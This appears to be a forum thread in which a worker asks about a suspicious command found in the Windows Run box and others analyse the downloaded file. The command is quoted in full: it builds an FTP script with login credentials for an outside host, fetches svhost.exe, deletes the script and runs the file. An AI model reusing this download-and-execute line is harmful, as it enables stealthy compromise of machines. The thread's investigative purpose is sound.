Jump to content

english please?


Recommended Posts

so i jumped on one of my computers at work today and went to start>run and i see this in the run line

cmd /c echo open ftp.r3kot.com 21 >> ik &echo user active@r3kot.com ;jwtc9lV?i{- >> ik &echo binary >> ik &echo get svhost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svhost.exe &exit

anyone got any ideas what that did exactly? i figured it got hacked so i wiped the computer and put linux on there, lol

Link to comment
Share on other sites

Whoever it was, was dumb enough to not erase their tracks if they did it from the run prompt. I'm sure it cna be narrowed down to specific people at your work. Also, the fact that they were downloading malware means they inteded to do something to your company, you should bring it to the attention of your boss as well as security(if you have any) and make sure they know it wasn't you who did it, since it was on the machine you sit at, you could be blamed for it!

Just scanned it at VT, and it found nothing: http://www.virustotal.com/analisis/c12911d...1893-1247962693

Maybe changed the file from the one sparda grabbed.

Inspeciting it more, it looks like a packed firefox with changed icons to look like a microsoft installer, but that could be someone tyrign to make it look like something else. This is what I see in the file: http://www.twistedpairrecords.com/digip/svchost-ftp.jpg

And google returns similar results for firefox installers: http://www.google.com/search?hl=en&q=f...G=Google+Search

edit: The md5 hash confirms it is firefox saved as svchost.exe:

0d39ccd077bc5fec7fccf063a6bc0e9b ./win32/en-GB/Firefox Setup 3.5.1.exe


Link to comment
Share on other sites

thanks for all the info, i really appreciate the help.

it a computer at our data center that one of the other guys uses and my office is across the street, so i'm hardly ever there. plus im smarter than that to leave the command line there, lol.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...